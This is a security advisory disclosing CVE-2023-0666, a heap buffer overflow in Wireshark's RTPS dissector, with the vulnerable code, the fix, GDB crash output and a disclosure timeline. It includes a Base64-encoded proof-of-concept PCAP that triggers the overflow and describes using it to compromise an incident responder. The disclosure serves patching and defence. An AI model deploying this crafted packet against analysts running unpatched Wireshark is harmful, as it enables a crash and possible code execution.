CVE-2023-0666: Wireshark RTPS Parsing Buffer Overflow#

AHA! has discovered an issue with Wireshark from The Wireshark Foundation, and is issuing this disclosure in accordance with AHA!’s standard disclosure policy today, on Monday, June 5, 2023. CVE-2023-0666 has been assigned to this issue.

Any questions about this disclosure should be directed to [email protected].

Executive Summary#

Due to failure in validating the length provided by an attacker-crafted RTPS packet, Wireshark version 4.0.5 and prior, by default, is susceptible to a heap-based buffer overflow, and possibly code execution in the context of the process running Wireshark. CVE-2023-0666 appears to be an instance of CWE-122.

Technical Details#

The rtps_util_add_type_library_type function contains a call to g_strlcpy that, without validation, uses a length supplied by the packet data that can result in a heap-based buffer overflow.

Snippet of the vulnerable code:

  static gint rtps_util_add_type_library_type(proto_tree *tree,
          tvbuff_t * tvb, gint offset, const guint encoding, dissection_info *info) {
    proto_tree * annotation_tree;
    guint32 member_id = 0, member_length = 0, long_number, i;
    gint offset_tmp;
    guint16 short_number;
    gchar * name = NULL;
    rtps_util_dissect_parameter_header(tvb, &offset, encoding, &member_id, &member_length);
    offset_tmp = offset;
/* ... */
    long_number = tvb_get_guint32(tvb, offset_tmp, encoding);
    name = tvb_get_string_enc(wmem_packet_scope(), tvb, offset_tmp+4, long_number, ENC_ASCII);
    if (info)
      (void) g_strlcpy(info->member_name, name, long_number);

The dissection_info struct is defined as:

  typedef struct _dissection_info {
    guint64 type_id;
    gint member_kind;
    guint64 base_type_id;
    guint32 member_length;
    gchar member_name[MAX_MEMBER_NAME];

    RTICdrTypeObjectExtensibility extensibility;

    gint32 bound;
    guint32 num_elements;
    dissection_element* elements;

  } dissection_info;

and MAX_MEMBER_NAME is defined as:

  #define MAX_MEMBER_NAME                 (256)

The overflow occurs when long_number is greater than 256 bytes however it should be noted that this does require that many bytes to have been sent.

g_strlcpy expects the size of the destination buffer as the last argument so this can be remediated by using sizeof(info->member_name) instead of long_number in the g_strlcpy call. Additionally, the return value should be checked because if it is greater than sizeof(info->member_name), then truncation occurred.

Reproduction: Run tshark -r rtps_trigger.pcap or open rtps_trigger.pcap in Wireshark. Note that an ASAN build is not required due to the way the PCAP was crafted.

Full output from running under GDB:

(gdb) run -r ~/rtps_trigger.pcap
Starting program: /usr/bin/tshark -r ~/rtps_trigger.pcap

This GDB supports auto-downloading debuginfo from the following URLs:
https://debuginfod.ubuntu.com
Enable debuginfod for this session? (y or [n]) n
Debuginfod has been disabled.
To make this setting permanent, add 'set debuginfod enabled off' to .gdbinit.
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
[New Thread 0x7fffebcdd6c0 (LWP 125835)]
[Thread 0x7fffebcdd6c0 (LWP 125835) exited]
[New Thread 0x7fffebcdd6c0 (LWP 125836)]
[Thread 0x7fffebcdd6c0 (LWP 125836) exited]
    1   0.000000 192.168.0.231 → 192.168.0.214 TCP 54 2603 → 9187 [SYN] Seq=0 Win=8192 Len=0
    2   0.000363 192.168.0.214 → 192.168.0.231 TCP 54 9187 → 2603 [SYN, ACK] Seq=0 Ack=0 Win=8192 Len=0
    3   0.000611 192.168.0.231 → 192.168.0.214 TCP 54 2603 → 9187 [ACK] Seq=1 Ack=0 Win=8192 Len=0
    4   0.000853 192.168.0.231 → 192.168.0.214 RTPS 1454 DATA_deprecated[Malformed Packet]

Thread 1 "tshark" received signal SIGSEGV, Segmentation fault.
wmem_block_split_free_chunk (allocator=0x5555555bf660, chunk=0x7fffe9f44fb0, size=<optimized out>) at ./wsutil/wmem/wmem_allocator_block.c:614
614     ./wsutil/wmem/wmem_allocator_block.c: No such file or directory.
(gdb) x/5i $pc
=> 0x7ffff088db1b <wmem_block_split_free_chunk+267>:    mov    QWORD PTR [rsi+0x10],rax
   0x7ffff088db1f <wmem_block_split_free_chunk+271>:    mov    QWORD PTR [r8+0x8],rax
   0x7ffff088db23 <wmem_block_split_free_chunk+275>:    jmp    0x7ffff088da9b <wmem_block_split_free_chunk+139>
   0x7ffff088db28 <wmem_block_split_free_chunk+280>:    nop    DWORD PTR [rax+rax*1+0x0]
   0x7ffff088db30 <wmem_block_split_free_chunk+288>:    mov    rax,QWORD PTR [rcx+0x10]
(gdb) p (char[]) $rsi
$1 = "AHA!AHA!"

A Base64 encoded blob of an example PCAP that can trigger the issue is below.

Click to expand
1MOyoQIABAAAAAAAAAAAAP//AAABAAAAW+1JZDkZDgA2AAAANgAAAHRGoNgQS3RGo
CvQ6AgARQAAKAABAABABvfBwKgA58CoANYKKyPjAAC1rAAAAABQAiAAKRoAAFvtSW
SkGg4ANgAAADYAAAB0RqAr0Oh0RqDYEEsIAEUAACgAAQAAQAb3wcCoANbAqADnI+M
KKwAAAAEAALWsUBIgACkJAABb7UlknBsOADYAAAA2AAAAdEag2BBLdEagK9DoCABF
AAAoAAEAAEAG98HAqADnwKgA1gorI+MAALWtAAAAAVAQIAApCgAAW+1JZI4cDgCuB
QAArgUAAHRGoNgQS3RGoCvQ6AgARQAFoAABAABABvJJwKgA58CoANYKKyPjAAC1rQ
AAAAJQGCAA7yIAAAAACJBSVFBTAgABAQAAAAAAAQkBEjRWeAIbeABSZWFkV3JpdJh
2VDIQ/ty6EjRWeN6tur5FZ4kKuqqqrRD+3LpyAEwAAQAAAAYAAABGaQABDgAAAAIA
AAARIjNEVWZ3iJmqu8zd7v8WFxgZICEiIyQBAgMEBQYHCAkQERITFBUWFxgZICEiI
yQDAAAARXhwAAEAAABBYTBBYTFBYTJBYTNBYTRBYTVBYTZBYTdBYThBYTlBYjBBYj
FBYjJBYjNBYjRBYjVBYjZBYjdBYjhBYjlBYzBBYzFBYzJBYzNBYzRBYzVBYzZBYzd
BYzhBYzlBZDBBZDFBZDJBZDNBZDRBZDVBZDZBZDdBZDhBZDlBZTBBZTFBZTJBZTNB
ZTRBZTVBZTZBZTdBZThBZTlBZjBBZjFBZjJBZjNBZjRBZjVBZjZBZjdBZjhBZjlBZ
zBBZzFBZzJBZzNBZzRBZzVBZzZBZzdBZzhBZzlBaAAEAABBaDJBaDNBaDRBaDVBaD
ZBaDdBaDhBaDlBaTBBaTFBaTJBaTNBaTRBaTVBaTZBaTdBaThBaTlBajBBajFBajJ
BajNBajRBajVBajZBajdBajhBajlBazBBazFBazJBazNBazRBazVBazZBazdBazhB
azlBbDBBbDFBbDJBbDNBbDRBbDVBbDZBbDdBbDhBbDlBbTBBbTFBbTJBbTNBbTRBb
TVBbTZBbTdBbThBbTlBbjBBbjFBbjJBbjNBbjRBbjVBbjZBbjdBbjhBbjlBbzBBbz
FBbzJBbzNBbzRBbzVBbzZBbzdBbzhBbzlBcDBBcDFBcDJBcDNBcDRBcDVBcDZBcDd
BcDhBcDlBcTBBcTFBcTJBcTNBcTRBcTVBcTZBcTdBcThBcTlBcjBBcjFBSEEhQUhB
ITRBcjVBcjZBcjdBcjhBcjlBczBBczFBczJBczNBczRBczVBczZBczdBczhBczlBd
DBBdDFBdDJBdDNBdDRBdDVBdDZBdDdBdDhBdDlBdTBBdTFBdTJBdTNBdTRBdTVBdT
ZBdTdBdThBdTlBdjBBdjFBdjJBdjNBdjRBdjVBdjZBdjdBdjhBdjlBdzBBdzFBdzJ
BdzNBdzRBdzVBdzZBdzdBdzhBdzlBeDBBeDFBeDJBeDNBeDRBeDVBeDZBeDdBeDhB
eDlBeTBBeTFBeTJBeTNBeTRBeTVBeTZBeTdBeThBeTlBejBBejFBejJBejNBejRBe
jVBejZBejdBejhBejlCYTBCYTFCYTJCYTNCYTRCYTVCYTZCYTdCYThCYTlCYjBCYj
FCYjJCYjNCYjRCYjVCYjZCYjdCYjhCYjlCYzBCYzFCYzJCYzNCYzRCYzVCYzZCYzd
CYzhCYzlCZDBCZDFCZDJCZDNCZDRCZDVCZDZCZDdCZDhCZDlCZTBCZTFCZTJCZTNC
ZTRCZTVCZTZCZTdCZThCZTlCZjBCZjFCZjJCZjNCZjRCZjVCZjZCZjdCZjhCZjlCZ
zBCZzFCZzJCZzNCZzRCZzVCZzZCZzdCZzhCZzlCaDBCaDFCaDJCaDNCaDRCaDVCaD
ZCaDdCaDhCaDlCaTBCQWEwQWExQWEyQWEzQWE0QWE1QWE2QWE3QWE4QWE5QWIwQWI
xQWIyQWIzQWI0QWI1QWI2QWI3QWI4QWI5QWMwQWMxQWMyQWMzQWM0QWM1QWM2QWM3
QWM4QWM5QWQwQWQxQWQyQWQzQWQ0QWQ1QWQ2QWQ3QWQ4QWQ5QWUwQWUxQWUyQWUzQ
WU0QWU1QWU2QWU3QWU4QWU5QWYwQWYxQWYyQWYzQWY0QWY1QWY2QWY3QWY4QWY5QW
cwQWcxQWcyQWczQWc0QWc1QWc2QWc3QWc4QWc5QWgwQWgxQWgyQWgzQWg0QWg1W+1
JZBUeDgA2AAAANgAAAHRGoCvQ6HRGoNgQSwgARQAAKAABAABABvfBwKgA1sCoAOcj
4worAAAAAgAAuyVQECAAI5EAAFvtSWQAHw4AUgMAAFIDAAB0RqDYEEt0RqAr0OgIA
EUAA0QAAQAAQAb0pcCoAOfAqADWCisj4wAAuyUAAAACUBggAG1hAABBaDZBaDdBaD
hBaDlBaTBBaTFBaTJBaTNBaTRBaTVBaTZBaTdBaThBaTlBajBBajFBajJBajNBajR
BajVBajZBajdBajhBajlBazBBazFBazJBazNBazRBazVBazZBazdBazhBazlBbDBB
bDFBbDJBbDNBbDRBbDVBbDZBbDdBbDhBbDlBbTBBbTFBbTJBbTNBbTRBbTVBbTZBb
TdBbThBbTlBbjBBbjFBbjJBbjNBbjRBbjVBbjZBbjdBbjhBbjlBbzBBbzFBbzJBbz
NBbzRBbzVBbzZBbzdBbzhBbzlBcDBBcDFBcDJBcDNBcDRBcDVBcDZBcDdBcDhBcDl
BcTBBcTFBcTJBcTNBcTRBcTVBcTZBcTdBcThBcTlBcjBBcjFBSEEhQUhBITRBcjVB
cjZBcjdBcjhBcjlBczBBczFBczJBczNBczRBczVBczZBczdBczhBczlBdDBBdDFBd
DJBdDNBdDRBdDVBdDZBdDdBdDhBdDlBdTBBdTFBdTJBdTNBdTRBdTVBdTZBdTdBdT
hBdTlBdjBBdjFBdjJBdjNBdjRBdjVBdjZBdjdBdjhBdjlBdzBBdzFBdzJBdzNBdzR
BdzVBdzZBdzdBdzhBdzlBeDBBeDFBeDJBeDNBeDRBeDVBeDZBeDdBeDhBeDlBeTBB
eTFBeTJBeTNBeTRBeTVBeTZBeTdBeThBeTlBejBBejFBejJBejNBejRBejVBejZBe
jdBejhBejlCYTBCYTFCYTJCYTNCYTRCYTVCYTZCYTdCYThCYTlCYjBCYjFCYjJCYj
NCYjRCYjVCYjZCYjdCYjhCYjlCYzBCYzFCYzJCYzNCYzRCYzVCYzZCYzdCYzhCYzl
CZDBCZDFCZDJCZDNCZDRCZDVCZDZCZDdCZDhCZDlCZTBCZTFCZTJCZTNCZTRCZTVC
ZTZCZTdCZThCZTlCZjBCZjFCZjJCZjNCZjRCZjVCZjZCZjdCZjhCZjlCZzBCZzFCZ
zJCZzNCZzRCZzVCZzZCZzdCZzhCZzlCaDBCaDFCaDJCaDNCaDRCaDVCaDZCaDdCaD
hCaDlCaTBCW+1JZHggDgA2AAAANgAAAHRGoCvQ6HRGoNgQSwgARQAAKAABAABABvf
BwKgA1sCoAOcj4worAAAAAgAAvkFQECAAIHUAAA==

Attacker Value#

By providing this poisoned RTPS packet, an attacker could hijack the user account of an analyst running Wireshark. Many security appliances capture packets as a matter of course for later analysis, and Wireshark is a common tool used by incident responders. So, it would be trivial for an attacker to intentionally “get caught” in order to provide their malicious packet to an incident response analyst. Once compromised, this can provide an attacker a unique, privileged position in the targeted network.

Credit#

This issue is being disclosed through the AHA! CNA and is credited to: Austin Hackers Anonymous!

Timeline#

Note, while we expected to publicly disclose this issue in early July (60 days after disclosure to The Wireshark Foundation), the vendor publicized the issue on May 22nd in issue 19085.

  • 2023-04-27 (Wed): Initial findings presented at the regularly scheduled meeting 0x00c7.
  • 2023-05-17 (Wed): PoC validated and analysis completed for disclosure.
  • 2023-05-18 (Thu): Disclosed to the vendor via email at [email protected].
  • 2023-05-18 (Thu): Vendor acknowledged, and opened issue 19085 to address.
  • 2023-05-21 (Sun): Patch merged to the release-4.0 branch of Wireshark.
  • 2023-05-22 (Mon): Issue 19085 made public by the vendor.
  • 2023-05-24 (Wed): CVE-2023-0666 fixed in Wireshark version 4.0.6
  • 2023-06-06 (Tue): Public disclosure of CVE-2023-0666